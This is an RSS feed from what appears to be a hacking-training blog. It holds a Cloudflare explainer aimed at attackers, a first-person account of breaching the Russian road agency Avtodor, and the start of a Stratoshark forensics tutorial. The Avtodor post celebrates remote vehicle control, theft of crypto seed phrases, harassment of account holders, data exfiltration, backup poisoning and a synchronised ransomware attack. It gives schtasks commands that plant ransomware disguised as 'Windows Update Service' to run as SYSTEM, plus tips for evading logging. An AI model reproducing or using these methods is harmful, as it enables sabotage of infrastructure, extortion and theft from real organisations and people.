<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
>
<channel>
<title>Hackers Arise</title>
<atom:link href="https://hackers-arise.com/feed/" rel="self" type="application/rss+xml" />
<link>https://hackers-arise.com</link>
<description>EXPERT CYBERSECURITY TRAINING FOR ETHICAL HACKERS</description>
<lastBuildDate>Mon, 30 Jun 2025 18:23:04 +0000</lastBuildDate>
<language>en-US</language>
<sy:updatePeriod>hourly</sy:updatePeriod>
<sy:updateFrequency>1</sy:updateFrequency>
<generator>https://wordpress.org/?v=6.8.1</generator>
<image>
<url>https://hackers-arise.com/wp-content/uploads/2025/04/cropped-Favicon-32x32.webp</url>
<title>Hackers Arise</title>
<link>https://hackers-arise.com</link>
<width>32</width>
<height>32</height>
</image>
<item>
<title>How Cloudflare Works: The Hacker Blueprint</title>
<link>https://hackers-arise.com/how-cloudflare-works-the-hacker-blueprint/</link>
<comments>https://hackers-arise.com/how-cloudflare-works-the-hacker-blueprint/#respond</comments>
<dc:creator><![CDATA[OTW]]></dc:creator>
<pubDate>Mon, 30 Jun 2025 18:05:30 +0000</pubDate>
<category><![CDATA[Cybersecurity Tools]]></category>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Defensive Security]]></category>
<category><![CDATA[Hacking]]></category>
<category><![CDATA[Uncategorized]]></category>
<category><![CDATA[Web Application Exploitation]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15837</guid>
<description><![CDATA[<p>How Cloudflare Works: The Hacker’s Blueprint Welcome back, my aspiring cyberwarriors! Often when we attack websites, we run up against Cloudflare. Cloudflare protects about 19.3% of all websites in the world. Its primary product is DDoS protection, but it also provides a content delivery network (CDN) and other Internet security products. If the attacker is to get past […]</p>
<p>The post <a href="https://hackers-arise.com/how-cloudflare-works-the-hacker-blueprint/">How Cloudflare Works: The Hacker Blueprint</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
<content:encoded><![CDATA[<h2 class="wp-block-heading" id="how-cloudflare-works-the-hackers-blueprint">How Cloudflare Works: The Hacker’s Blueprint</h2>
<p>Welcome back, my aspiring cyberwarriors!</p>
<p>Often when we attack websites, we run up against Cloudflare. Cloudflare protects about 19.3% of all websites in the world. Its primary product is DDoS protection, but it also provides a content delivery network (CDN) and other Internet security products.</p>
<p>If an attacker is to get past this ubiquitous security product, they first need to know how it functions. In this tutorial, I will help you understand how Cloudflare works; in a subsequent tutorial, I will show you how Cloudflare can be bypassed.</p>
<p>Let’s get started!</p>
<h2 class="wp-block-heading">What Is Cloudflare?</h2>
<p>Cloudflare is like a digital “bouncer” and performance booster for millions of websites. It sits between users and web servers, filtering, accelerating, and protecting traffic. </p>
<p>If you want to understand modern web security—or break it—you need to know how Cloudflare works.</p>
<h2 class="wp-block-heading">Step 1: DNS and Proxy Magic</h2>
<p>When you put your site behind Cloudflare, you point your domain’s nameservers to Cloudflare. Now, <strong>Cloudflare becomes your authoritative DNS provider</strong>—it answers all DNS queries for your domain. But here’s the trick:</p>
<ul class="wp-block-list">
<li>For proxied records, Cloudflare responds with its own <strong>anycast IP addresses</strong>—not your origin server’s real IP.</li>
<li>All user requests hit Cloudflare’s global edge network first, then get relayed to your real server.</li>
</ul>
<p><strong>Result:</strong> Attackers can’t see the origin IP, and all traffic is filtered through Cloudflare’s defenses.</p>
<h2 class="wp-block-heading">Step 2: CDN—Speed and Stealth</h2>
<p>Cloudflare is a <strong>content delivery network (CDN)</strong> with data centers in 330+ cities.</p>
<ul class="wp-block-list">
<li>It caches static content (images, scripts, etc.) at edge locations, serving users from the nearest node.</li>
<li>This reduces latency, offloads your server, and makes DDoS attacks less effective.</li>
</ul>
<p>To bypass Cloudflare’s security, you must find the actual IP of the website.</p>
<h2 class="wp-block-heading">Step 3: Security—The Shield Wall</h2>
<p>Cloudflare’s security arsenal includes:</p>
<ul class="wp-block-list">
<li><strong>DDoS Protection:</strong> Detects and blocks massive floods of malicious traffic using real-time analysis and dynamic rules</li>
<li><strong>Web Application Firewall (WAF):</strong> Blocks SQLi, XSS, CSRF, and other web attacks with managed rulesets that are constantly updated</li>
<li><strong>SSL/TLS Encryption:</strong> Automatically issues and manages certificates, encrypting all traffic between users and Cloudflare, and optionally between Cloudflare and your origin server</li>
<li><strong>Access Control:</strong> Restricts who can access sensitive parts of your site, with support for multi-factor authentication and IP whitelisting</li>
<li><strong>DNSSEC:</strong> Prevents DNS spoofing and cache poisoning attacks</li>
</ul>
<p></p>
<h2 class="wp-block-heading">Step 4: DDoS Mitigation—How the Giant Fights Back</h2>
<p>Cloudflare’s DDoS systems work by:</p>
<ul class="wp-block-list">
<li>Sampling and analyzing traffic for patterns (source IP, protocols, HTTP headers, error rates).</li>
<li>When attack traffic is detected, Cloudflare creates a <strong>real-time fingerprint</strong> and deploys mitigation rules globally, blocking, challenging, or rate-limiting malicious requests.</li>
<li>Legitimate users pass through; attackers get blocked or hit with CAPTCHAs.</li>
</ul>
<p><strong>Hacker’s Note:</strong> Cloudflare’s rules are dynamic and ephemeral—meaning the shield adapts in real time.</p>
<h2 class="wp-block-heading">Step 5: Edge Computing</h2>
<p>Cloudflare isn’t just a shield—it’s also an edge platform.</p>
<ul class="wp-block-list">
<li>You can run JavaScript code (Cloudflare Workers) at the edge, right next to users.</li>
<li>This allows for custom logic, instant redirects, or even serverless apps—without touching your origin.</li>
</ul>
<p><strong>Why does this matter?</strong></p>
<ul class="wp-block-list">
<li>For defenders: You can block, log, or modify traffic before it ever hits your server.</li>
<li>For hackers: You need to test both the edge and the origin for vulnerabilities.</li>
</ul>
<h2 class="wp-block-heading">How to Spot and Test Cloudflare</h2>
<ol class="wp-block-list">
<li><strong>Check DNS:</strong>
<ul class="wp-block-list">
<li>Use <code>dig</code> or <code>nslookup</code>. If your domain resolves to Cloudflare IP addresses (typically 104.x.x.x or 172.x.x.x), the site is behind Cloudflare.</li>
</ul>
</li>
<li><strong>Bypass Attempts:</strong>
<ul class="wp-block-list">
<li>Try to find the origin IP (historical DNS, email headers, subdomains, direct IP leaks).</li>
<li>Test for unproxied subdomains or services.</li>
</ul>
</li>
<li><strong>WAF Testing:</strong>
<ul class="wp-block-list">
<li>Send common attack payloads (SQLi, XSS) and look for custom error pages or CAPTCHAs.</li>
</ul>
</li>
<li><strong>DDoS Testing:</strong>
<ul class="wp-block-list">
<li>Simulate traffic spikes and see how Cloudflare responds (rate limiting, blocks, challenges).</li>
</ul>
</li>
</ol>
<h2 class="wp-block-heading">Summary</h2>
<p>Cloudflare is a global proxy, CDN, and security platform that shields websites from attacks and speeds up delivery. To get past Cloudflare protection, you must first understand how it works. In an upcoming tutorial, I will show you some ways of bypassing Cloudflare protection.</p>
<p><strong>Stay sharp. Know the shield before you test the sword.</strong></p>
<p>The post <a href="https://hackers-arise.com/how-cloudflare-works-the-hacker-blueprint/">How Cloudflare Works: The Hacker Blueprint</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/how-cloudflare-works-the-hacker-blueprint/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>CyberWar: The Breach at Avtodor– Control and Collapse – Breaking Down the Infrastructure, Part 2</title>
<link>https://hackers-arise.com/cyberwar-the-breach-at-avtodor-control-and-collapse-breaking-down-the-infrastructure-part-2/</link>
<comments>https://hackers-arise.com/cyberwar-the-breach-at-avtodor-control-and-collapse-breaking-down-the-infrastructure-part-2/#respond</comments>
<dc:creator><![CDATA[Alita]]></dc:creator>
<pubDate>Thu, 26 Jun 2025 19:37:15 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Hacking]]></category>
<category><![CDATA[IoT Hacking]]></category>
<category><![CDATA[IP Camera Hacking]]></category>
<category><![CDATA[SCADA/ICS Hacking]]></category>
<category><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15709</guid>
<description><![CDATA[<p>Welcome back, cyberwarriors! In my previous article I detailed the process of infiltrating Avtodor, the Russian state-run company overseeing the construction and maintenance of roads and highways. In part II we finally execute our well-laid plans. Taking Over the Specialized Vehicles Most dispatcher terminals ran a vehicle monitoring app—basic fleet management. You’d expect […]</p>
<p>The post <a href="https://hackers-arise.com/cyberwar-the-breach-at-avtodor-control-and-collapse-breaking-down-the-infrastructure-part-2/">CyberWar: The Breach at Avtodor– Control and Collapse – Breaking Down the Infrastructure, Part 2</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
<content:encoded><![CDATA[<p id="foo">Welcome back, cyberwarriors! </p>
<p></p>
<p id="foo">In my previous article I detailed the process of infiltrating Avtodor, the Russian state-run company overseeing the construction and maintenance of roads and highways. In part II we finally execute our well-laid plans.</p>
<h2 class="wp-block-heading" id="xfafy46916"><strong>Taking Over the Specialized Vehicles</strong></h2>
<figure class="wp-block-image size-full"><img fetchpriority="high" decoding="async" width="861" height="689" src="https://hackers-arise.com/wp-content/uploads/2025/06/SCADA.jpg" alt="" class="wp-image-15710" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/SCADA.jpg 861w, https://hackers-arise.com/wp-content/uploads/2025/06/SCADA-300x240.jpg 300w, https://hackers-arise.com/wp-content/uploads/2025/06/SCADA-768x615.jpg 768w" sizes="(max-width: 861px) 100vw, 861px" /></figure>
<p></p>
<p>Most dispatcher terminals ran a vehicle monitoring app—basic fleet management. You’d expect some login protection and technically it was there. But in more than one case, the login and password were the same. Low effort, low defense. Once inside, we could see everything: routes, current tasks, maintenance logs, even mechanical health stats for individual parts of each vehicle.</p>
<p></p>
<figure class="wp-block-image size-full"><img decoding="async" width="863" height="689" src="https://hackers-arise.com/wp-content/uploads/2025/06/Dispatcher-Terminal.jpg" alt="" class="wp-image-15711" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/Dispatcher-Terminal.jpg 863w, https://hackers-arise.com/wp-content/uploads/2025/06/Dispatcher-Terminal-300x240.jpg 300w, https://hackers-arise.com/wp-content/uploads/2025/06/Dispatcher-Terminal-768x613.jpg 768w" sizes="(max-width: 863px) 100vw, 863px" /><figcaption class="wp-element-caption">Fleet activity report generated from a GPS/telemetry system</figcaption></figure>
<p></p>
<figure class="wp-block-image size-full"><img decoding="async" width="867" height="695" src="https://hackers-arise.com/wp-content/uploads/2025/06/GPS-tracking-and-activity-report-for-utility-vehicles.jpg" alt="" class="wp-image-15712" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/GPS-tracking-and-activity-report-for-utility-vehicles.jpg 867w, https://hackers-arise.com/wp-content/uploads/2025/06/GPS-tracking-and-activity-report-for-utility-vehicles-300x240.jpg 300w, https://hackers-arise.com/wp-content/uploads/2025/06/GPS-tracking-and-activity-report-for-utility-vehicles-768x616.jpg 768w" sizes="(max-width: 867px) 100vw, 867px" /><figcaption class="wp-element-caption">GPS tracking and activity report for utility vehicles</figcaption></figure>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="592" src="https://hackers-arise.com/wp-content/uploads/2025/06/The-КАРТА-fleet-monitoring-dashboard.avif" alt="" class="wp-image-15713" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/The-КАРТА-fleet-monitoring-dashboard.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/The-КАРТА-fleet-monitoring-dashboard-300x240.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /><figcaption class="wp-element-caption">The КАРТА fleet monitoring dashboard</figcaption></figure>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="592" src="https://hackers-arise.com/wp-content/uploads/2025/06/Vehicle-Tracking-Dashboard-1.avif" alt="" class="wp-image-15715" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/Vehicle-Tracking-Dashboard-1.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/Vehicle-Tracking-Dashboard-1-300x240.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /><figcaption class="wp-element-caption">Vehicle status and tracking dashboard</figcaption></figure>
<p></p>
<p id="24k8p57350">We could track them in real time, stop them, and watch the weather in that part of Moscow where they were. You name it! It was full visibility and full control.</p>
<p id="y96xg43949">If you’ve seen <em>Mr. Robot</em>, you’ll remember that scene where the FBI was tailing a taxi with Elliot and Darlene in it. Irving called dispatch, claimed the car was stolen, and they shut it down remotely. Same concept here. It was live.</p>
<h2 class="wp-block-heading" id="gia2u43973"><strong>Data Exfiltration</strong></h2>
<p id="3674443988">By the time we got to this stage, we knew the system inside and out. Exfil was quick. Sometimes manual—grab what you need as you go. Other times scripted, if the target folders were obvious or if we were short on time.</p>
<p id="s1zwh43997">Small files were pulled out using Evil-WinRM through the SOCKS proxy. For bigger dumps, we used PowerShell scripts like PSUpload. Could we have gone full covert with ICMP or DNS tunneling? Sure. But it wasn’t necessary. The real threat wasn’t the network—it was the user and whatever AV they had running.</p>
<h2 class="wp-block-heading" id="qkr9p44028"><strong>Paranoia</strong></h2>
<p id="46noq44142">This part was saved for the collaborators, people working in the occupied zones. Like in Dante’s circles, traitors had the worst fate.</p>
<p id="dyl0044156">It took a week of steady pressure: accounts deleted, passwords changed, password reset codes spammed to phones, active sessions shut down across Telegram, WhatsApp, browser syncs. 2FA tokens were revoked. Authenticator apps unlinked. Anything that could be touched, was touched. If we couldn’t delete the account, we wiped the contents.</p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="416" src="https://hackers-arise.com/wp-content/uploads/2025/06/6a4a49_31405da2c11d476cbfcd391b6075746dmv2.avif" alt="" class="wp-image-15716" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/6a4a49_31405da2c11d476cbfcd391b6075746dmv2.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/6a4a49_31405da2c11d476cbfcd391b6075746dmv2-300x169.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="368" src="https://hackers-arise.com/wp-content/uploads/2025/06/Disabling-Two-Factor-Authentication.avif" alt="" class="wp-image-15717" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/Disabling-Two-Factor-Authentication.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/Disabling-Two-Factor-Authentication-300x149.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="492" src="https://hackers-arise.com/wp-content/uploads/2025/06/Telegram.avif" alt="" class="wp-image-15718" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/Telegram.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/Telegram-300x199.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p></p>
<p id="4ck9044608">Some had seed phrases stored in Telegram saved messages, right there on their workstations. Those phrases didn’t stay there long.</p>
<p id="qgame44639">Now imagine waking up to that. Day after day. You don’t know how deep it goes. Maybe someone’s watching your webcam. Maybe your mic is live. It’s not the breach that gets them, it’s the uncertainty.</p>
<h2 class="wp-block-heading" id="ag86r44759"><strong>Web Application: Digital Access Control</strong></h2>
<p id="cd3jl44812">There was a centralized web app managing access permits for vehicles and workers. You could issue new permits or revoke existing ones. You could even hire and fire staff by adding or removing IDs in the backend.</p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="416" src="https://hackers-arise.com/wp-content/uploads/2025/06/The-login-screen-for-an-internal-system-used-by-the-Moscow-municipal-road-services.avif" alt="" class="wp-image-15719" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/The-login-screen-for-an-internal-system-used-by-the-Moscow-municipal-road-services.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/The-login-screen-for-an-internal-system-used-by-the-Moscow-municipal-road-services-300x169.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /><figcaption class="wp-element-caption">The login screen for an internal system used by the Moscow municipal road services</figcaption></figure>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="416" src="https://hackers-arise.com/wp-content/uploads/2025/06/Globador-used-for-managing-employee-access.avif" alt="" class="wp-image-15720" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/Globador-used-for-managing-employee-access.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/Globador-used-for-managing-employee-access-300x169.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /><figcaption class="wp-element-caption">Globador, used for managing employee access</figcaption></figure>
<p id="80lmn60744">We didn’t hesitate. All active permits were revoked. IDs started vanishing from the system. By the end, it looked like a startup with one lonely admin left—except we changed his password too. Now it was our account.</p>
<h2 class="wp-block-heading" id="y2x7g45202"><strong>The Rugpull</strong></h2>
<p id="pgq0x45264">4 AM Moscow time was the best window for this task. Low traffic. Fewer eyes. Fewer questions. That gave us a solid two-hour block to hit the entire network without resistance.</p>
<p id="prfeh45286">By this point, Windows Defender was disabled across all critical machines. That was handled earlier. The plan was to drop ransomware and encrypt systems in one synchronized hit.</p>
<p id="hbfzf45288">If the environment uses Active Directory, you can use Group Policy to push a scheduled task across all systems. That task downloads a payload from a shared folder and runs it. If no AD? You upload executables manually. Slower, but still gets the job done; it just needs more hands or more time. But be careful: if they cut the internet as a defense, that’s when the lights go out for all of us.</p>
<p id="mkr9v45290">For larger environments without AD, we set up individual scheduled tasks on each system with SYSTEM-level privileges. That way, they all execute at once and cook the entire network clean.</p>
<p id="ui93s45426">Here’s how you set up a scheduled task in CMD or PowerShell:</p>
<p id="s47w945294"><code>schtasks /create /tn "Windows Update Service" /tr "C:\Windows\Tasks\RANSOME.exe" /sc daily /st 04:00 /ru System /f</code></p>
<p id="tocrl45460">To confirm it’s in place:</p>
<p id="6iui745298"><code>schtasks /query /tn "Windows Update Service"</code></p>
<p id="33dat45494">And if you ever need to force it early:</p>
<p id="qfiz145302"><code>schtasks /run /tn "Windows Update Service"</code></p>
<p id="7676b45528">CMD is your friend here; it’s quieter than PowerShell, which logs everything. Set the task daily, just in case. If the grid drops at 4 AM, you get another shot tomorrow. Let the machines handle the rest.</p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="304" src="https://hackers-arise.com/wp-content/uploads/2025/06/Network.avif" alt="" class="wp-image-15721" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/Network.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/Network-300x123.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p></p>
<p id="859kn45863">Here you can see some of them “well-done”. The entire network, of course, wouldn’t fit the screen.</p>
<h2 class="wp-block-heading" id="wro0m45826"><strong>Taking Over the Cloud</strong></h2>
<p id="poby545828">Once we sorted through the internal data, we found credentials to their cloud systems. The cloud was used to monitor production with data coming in from various sites, all centralized for analysis.</p>
<p id="x1lr345830">We got lucky. The admin account was compromised early. We had full control. But we didn’t go loud. Instead, we dismantled it piece by piece. It started with quiet database edits. Not deletion, but distortion. So when backups ran, they saved corrupted data. Over time, the backups themselves were poisoned.</p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="341" src="https://hackers-arise.com/wp-content/uploads/2025/06/user-access-control-interface-for-the-Moscow-city-government.avif" alt="" class="wp-image-15725" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/user-access-control-interface-for-the-Moscow-city-government.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/user-access-control-interface-for-the-Moscow-city-government-300x138.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /><figcaption class="wp-element-caption">User access control interface for the Moscow city government</figcaption></figure>
<p></p>
<p>After about a month of quiet manipulation, we flipped the switch. Deleted users, wiped records, wrecked the environment from the inside. This happened right after we crippled their internal network, so there was no quick fix.</p>
<p></p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="740" height="584" src="https://hackers-arise.com/wp-content/uploads/2025/06/connection-timeout-error.avif" alt="" class="wp-image-15726" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/connection-timeout-error.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/connection-timeout-error-300x237.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<p></p>
<p id="fs4xp46742">They scrambled to rebuild the cloud from scratch. Some data might be gone forever. That’s the kind of loss you can’t patch over.</p>
<h2 class="wp-block-heading" id="2ncbr46697"><strong>Conclusion</strong></h2>
<p id="u2bdn46699">From initial access through the supply chain to full control over Avtodor’s infrastructure, this operation showed how deep a network can be penetrated when persistence, planning, and patience come together. We moved through cloud environments, dispatcher systems, surveillance feeds, and vehicle control platforms collecting intel, disrupting operations, and leaving no corner untouched.</p>
<p id="6sokw46701">The exfiltration was clean. The sabotage was deliberate. The system was compromised from inside out, quiet at first, then loud enough to leave a lasting mark.</p>
<p id="xd0st46703">Hope you cyberwarriors learned something new about access, control, timing, and the art of staying hidden until it’s time to strike!</p><p>The post <a href="https://hackers-arise.com/cyberwar-the-breach-at-avtodor-control-and-collapse-breaking-down-the-infrastructure-part-2/">CyberWar: The Breach at Avtodor– Control and Collapse – Breaking Down the Infrastructure, Part 2</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/cyberwar-the-breach-at-avtodor-control-and-collapse-breaking-down-the-infrastructure-part-2/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>Network Forensics: Getting Started With Stratoshark</title>
<link>https://hackers-arise.com/network-forensics-getting-started-with-stratoshark/</link>
<comments>https://hackers-arise.com/network-forensics-getting-started-with-stratoshark/#respond</comments>
<dc:creator><![CDATA[aircorridor]]></dc:creator>
<pubDate>Tue, 24 Jun 2025 20:24:41 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Data Analytics]]></category>
<category><![CDATA[Digital Forensics]]></category>
<category><![CDATA[InfoSec]]></category>
<category><![CDATA[Network Exploitation]]></category>
<category><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=15587</guid>
<description><![CDATA[<p>Welcome back, aspiring Digital Forensics Investigators! For decades, the open-source Wireshark network protocol analyzer has been an essential tool for networking professionals, enabling them to inspect and troubleshoot network traffic through packet analysis. However, as organizations have increasingly shifted workloads to the cloud, they’ve struggled with reduced visibility into system activity. To address this gap, […]</p>
<p>The post <a href="https://hackers-arise.com/network-forensics-getting-started-with-stratoshark/">Network Forensics: Getting Started With Stratoshark</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
<content:encoded><![CDATA[<p id="foo">Welcome back, aspiring Digital Forensics Investigators!</p>
<p id="6ydrg77">For decades, the open-source Wireshark network protocol analyzer has been an essential tool for networking professionals, enabling them to inspect and troubleshoot network traffic through packet analysis. However, as organizations have increasingly shifted workloads to the cloud, they’ve struggled with reduced visibility into system activity. To address this gap, Stratoshark was introduced.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="387" src="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_logo.avif" alt="" class="wp-image-15588" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_logo.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_logo-300x157.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<h2 class="wp-block-heading" id="vw6b6113"><strong>What is Stratoshark?</strong></h2>
<p id="muljb115">Stratoshark is a companion application to Wireshark, designed to analyze system calls and log messages from SCAP files, providing deeper insights into system-level activity. Since modern cloud systems primarily use Linux for running applications in containers, Stratoshark helps users troubleshoot, secure, and monitor their systems by capturing system activity directly from the Linux kernel.</p>
<p id="slyvn117">Just as Wireshark helps network teams analyze packet data from PCAP files, Stratoshark records and interprets system activity using libsinsp and libscap libraries, creating .scap files for detailed analysis.</p>
<ul id="67jy0119" class="wp-block-list">
<li><strong>libsinsp</strong> is a system event processing library that allows Stratoshark to analyze system calls in real time, offering insights into how processes interact with the operating system.</li>
<li><strong>libscap</strong> is responsible for capturing system calls and audit logs directly from the Linux kernel, functioning as the data collection engine behind Stratoshark. It enables users to record detailed system activity for later examination.</li>
</ul>
<p id="rjpm0126">Stratoshark extends beyond system calls to enhance cloud security monitoring. It can collect cloud audit logs using libscap, the same library used by Sysdig (a security and monitoring tool) and Falco (a runtime security tool for detecting threats). With the Falco CloudTrail plugin, Stratoshark retrieves AWS CloudTrail logs from S3, SQS, or SNS, helping security teams detect and analyze potential threats in cloud environments.</p>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="740" height="387" src="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_structure.avif" alt="" class="wp-image-15589" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_structure.avif 740w, https://hackers-arise.com/wp-content/uploads/2025/06/stratoshark_structure-300x157.jpg 300w" sizes="(max-width: 740px) 100vw, 740px" /></figure>
<h2 class="wp-block-heading" id="6f19s313"><strong>What are System Calls?</strong></h2>
<p id="75stz315">On a computer, you have various applications, such as web browsers, email clients, music players, and word processors—along with anything else you’ve installed. These applications often need to interact with external resources: web browsers require network access, music players need sound devices, etc. However, these applications don’t inherently know how to handle these interactions by themselves.</p>
<p id="2q1uc317">The operating system (OS) manages these interactions. It distinguishes between different connection types like WiFi and Ethernet, or storage devices like NVMe and SATA drives. More importantly, it abstracts these differences away so applications don’t need to worry about the underlying hardware details.</p>
<p id="i5amw319">To facilitate this, the OS provides a standard set of functions that applications use to interact with external devices. These functions are typically straightforward, such as read(), write(), socket(), and sendmsg(). Together, they form what we call system calls. By monitoring these system calls, we can observe everything a program attempts to do—from network communications and file access to sound playback and much more.</p>
<h2 class="wp-block-heading" id="bthl9424"><strong>How Can We Capture System Calls?</strong></h2>
<p id="an7k8426">You can generate SCAP files using the sysdig command-line tool or by running Stratoshark directly on a Linux system.</p>
<p id="bunuh428">Stratoshark supports multiple capture sources, including:</p>
<ul id="48bsf430" class="wp-block-list">
<li>Falcodump – Captures logs from various sources using Falco plugins and Linux syscalls.</li>
<li>Sshdig – Enables remote system call capture over SSH using Sysdig.</li>
</ul>
<h2 class="wp-block-heading" id="l4bda634"><strong>Key Features of Stratoshark</strong></h2>
<p id="wmvu7636">Stratoshark offers several powerful features that make it an essential tool for system-level analysis:</p>
<ol start="1" id="gj88g638" class="wp-block-list">
<li><strong>Real-time System Activity Monitoring</strong>: Track and analyze system calls as they happen.</li>
<li><strong>Comprehensive Filtering Options</strong>: Quickly isolate relevant system events using display filters.</li>
<li><strong>Cloud Integration</strong>: Native support for analyzing cloud audit logs.</li>
<li><strong>Visualization Tools</strong>: Transform complex system call sequences into understandable visualizations.</li>
<li><strong>Container Visibility</strong>: Gain insights into containerized applications and their interactions.</li>
<li><strong>Threat Detection</strong>: Identify suspicious activity patterns through system call analysis.</li>
</ol>
<p id="2pcf4663">Similar to Wireshark’s color-coding for packet types, Stratoshark uses visual indicators to help analysts quickly identify different types of system calls and potential security issues.</p>
<h2 class="wp-block-heading" id="ej6qz943"><strong>Stratoshark vs. Wireshark: Understanding the Differences</strong></h2>
<p id="d4qhx945">While Stratoshark and Wireshark share similar interfaces and analysis approaches, they focus on different aspects of system observation:</p>
<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Feature</td><td>Stratoshark</td><td>Wireshark</td></tr><tr><td>Primary Focus</td><td>System calls and OS interactions</td><td>Network packets and protocols</td></tr><tr><td>File Format</td><td>SCAP files</td><td>PCAP files</td></tr><tr><td>Main Use Cases</td><td>System troubleshooting, security monitoring, container analysis</td><td>Network troubleshooting, protocol analysis, traffic inspection</td></tr><tr><td>Capture Mechanism</td><td>Kernel modules, eBPF probes</td><td>Network interfaces, packet capture libraries</td></tr><tr><td>Environment</td><td>Particularly valuable in cloud and containerized systems</td><td>Network infrastructure (physical or virtual)</td></tr><tr><td>Analysis Level</td><td>OS and application behavior</td><td>Network communications</td></tr></tbody></table></figure>
<p id="he50b3579">These tools complement each other perfectly – Wireshark reveals what’s happening on the network, while Stratoshark provides visibility into what’s occurring inside the systems themselves.</p>
<h2 class="wp-block-heading" id="sy1jh3757"><strong>Getting Stratoshark</strong></h2>
<p id="u4o5y3759">Development packages for <a href="https://www.wireshark.org/download/automated/win64/" rel="noreferrer noopener" target="_blank"><strong><u>Windows</u></strong></a> and <a href="https://www.wireshark.org/download/automated/osx/" rel="noreferrer noopener" target="_blank"><strong><u>macOS</u></strong></a> are available through Wireshark’s automated builds. Note that native system call capture isn’t supported on these platforms.</p>
<p id="hrkfl3765">For Stratoshark on Linux, you’ll need to <a href="https://gitlab.com/wireshark/wireshark/-/blob/master/doc/stratoshark-quick-start.adoc#user-content-building-stratoshark" rel="noreferrer noopener" target="_blank"><strong><u>build it from source</u></strong></a>.</p>
<p id="w99ao3769">For simplicity and ease of learning, I’ll be using Windows 11, where the installation process is as straightforward as any standard Windows application.</p>
<h2 class="wp-block-heading" id="rcg6o4114"><strong>First Look: Navigating the Stratoshark Interface</strong></h2>
<h3 class="wp-block-heading" id="0672f4116"><strong>Initial Launch Experience</strong></h3>
